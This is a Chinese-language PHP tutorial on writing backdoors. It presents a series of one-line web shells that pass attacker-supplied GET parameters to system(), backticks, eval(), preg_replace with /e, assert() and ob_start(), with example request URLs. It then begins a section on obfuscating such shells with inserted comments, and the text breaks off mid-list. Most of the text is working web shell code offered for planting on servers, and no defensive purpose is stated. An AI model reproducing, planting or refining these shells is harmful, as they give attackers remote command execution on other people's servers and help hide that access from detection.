php后门的编写_php教程_php教程

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子，其他的可以查看php手册编写 system() ? php system($_GET['input']); ? http://192.168.247.133:81/shell.php?input=dir ``执行命令 ``执行命令等...

0x1 原理

1、执行系统命令的函数

proc_open, popen, exec, shell_exec,passthru,system

这里只给出两个例子，其他的可以查看php手册编写

system()

    <?php
    system($_GET['input']);
    ?>

http://192.168.247.133:81/shell.php?input=dir

“``”执行命令

``执行命令等价于shell_exec()函数来执行命令。

    <?php
    echo`$_GET[input]`;
    ?>

http://192.168.247.133:81/shell.php?input=dir

再来个更短的

<?=@`$_GET[c]`?>

http://192.168.247.133:81/shell.php?c=dir

注：这个要开启short_open_tag的，不过默认为on

2、可以执行代码的函数

eval() 函数把字符串按照PHP 代码来计算，该字符串必须是合法的PHP 代码，且必须以分号结尾。

    <?php
    eval($_GET['input']);
    ?>

正则表达式

Preg_replace函数的作用是用来执行常规表达式的查找和替换的，Mixed preg_replace(mixed pattern, mixed replacement, mixed subject,int limit, int &count)其中，Pattern是用来查找的常规表达式，replacement是用来替换的字符串，submit是要查找替换的字符串，limit是可以替换的字符串数，count是成功替换的数目。函数将返回替换后的字符串，当Pattern参数使用/e修正符时，preg_replace函数会将replacement参数当作PHP代码执行。

    <?php
    preg_replace("//e",$_GET['input'],"qingsh4n");
    ?>

assert()

assert这个函数在php语言中是用来判断一个表达式是否成立。但是其字符串参数会被执行。

    <?php
    assert($_GET['input']);
    ?>

ob_start()

    <?php
    $foobar =$_GET['input1'];
    ob_start($foobar);
    echo$_GET['input2'];
    ob_end_flush();
    ?>

http://192.168.247.133:81/shell.php?input1=system&input2=dir

更多的函数需要同志们去挖掘。

0x2 如何混淆

1、注释/**/

    <?php
    assert/**/($/**/{"_GET"}['input']);
    ?>

2、连接号